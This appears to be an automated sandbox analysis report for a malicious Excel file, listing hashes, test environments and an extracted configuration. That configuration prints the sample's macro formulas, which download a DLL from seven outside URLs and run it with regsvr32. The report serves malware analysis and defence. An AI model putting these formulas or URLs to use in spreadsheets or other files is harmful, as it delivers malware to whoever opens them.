General
-
Target
7cee247612648768334e86257d261f449d912e932e21b9a14ecb07021fa0a4f8
-
Size
46KB
-
Sample
240909-1yxnlasenr
-
MD5
11972159b66a204b1919f76d91deb8ba
-
SHA1
2fa2d71c2186e92d9da1ead092682bf69a707100
-
SHA256
7cee247612648768334e86257d261f449d912e932e21b9a14ecb07021fa0a4f8
-
SHA512
49a5f0196de7fece97f8c7856a72b3039aaf07d4e23200af3486ba249996509893ada9e0aab8f8709c838ce89379591f35e160812f2a06bca1758c902d374ea5
-
SSDEEP
768:QCtavYd+Svhh03WwMVRI0woWEVWbYld0PzuJqc3YHXpFZxmk9w7LPfhsLXDKt:9tagdTvHOWwMV5o4cu0PKJ3Y3pYk9whN
Static task
static1
Behavioral task
behavioral1
Sample
7cee247612648768334e86257d261f449d912e932e21b9a14ecb07021fa0a4f8.xlsx
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
7cee247612648768334e86257d261f449d912e932e21b9a14ecb07021fa0a4f8.xlsx
Resource
win10v2004-20240802-en
Malware Config
Extracted
https://ballpointmedia.com/css/WDvvKlTTncgkazP/
http://www.altoxi.com/UIc/04GtHAQGA/
http://www.apesb.com/language/IgWs7RRV/
http://www.ara-choob.com/data1/Tzm3xsCsT4DScdUFOx/
http://www.techniquesbroadband.net/pay/Bxp/
http://www.arisgears.com/cgi-bin/dkeY/
https://www.manchesterslt.co.uk/a-to-z-of-slt/rNrJKOM2h/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ballpointmedia.com/css/WDvvKlTTncgkazP/","..\ujg.dll",0,0) =IF('EGDGB'!F7<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.altoxi.com/UIc/04GtHAQGA/","..\ujg.dll",0,0)) =IF('EGDGB'!F9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.apesb.com/language/IgWs7RRV/","..\ujg.dll",0,0)) =IF('EGDGB'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ara-choob.com/data1/Tzm3xsCsT4DScdUFOx/","..\ujg.dll",0,0)) =IF('EGDGB'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.techniquesbroadband.net/pay/Bxp/","..\ujg.dll",0,0)) =IF('EGDGB'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.arisgears.com/cgi-bin/dkeY/","..\ujg.dll",0,0)) =IF('EGDGB'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.manchesterslt.co.uk/a-to-z-of-slt/rNrJKOM2h/","..\ujg.dll",0,0)) =IF('EGDGB'!F19<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ujg.dll") =RETURN()
Targets
-
-
Target
7cee247612648768334e86257d261f449d912e932e21b9a14ecb07021fa0a4f8
-
Size
46KB
-
MD5
11972159b66a204b1919f76d91deb8ba
-
SHA1
2fa2d71c2186e92d9da1ead092682bf69a707100
-
SHA256
7cee247612648768334e86257d261f449d912e932e21b9a14ecb07021fa0a4f8
-
SHA512
49a5f0196de7fece97f8c7856a72b3039aaf07d4e23200af3486ba249996509893ada9e0aab8f8709c838ce89379591f35e160812f2a06bca1758c902d374ea5
-
SSDEEP
768:QCtavYd+Svhh03WwMVRI0woWEVWbYld0PzuJqc3YHXpFZxmk9w7LPfhsLXDKt:9tagdTvHOWwMV5o4cu0PKJ3Y3pYk9whN
Score3/10 -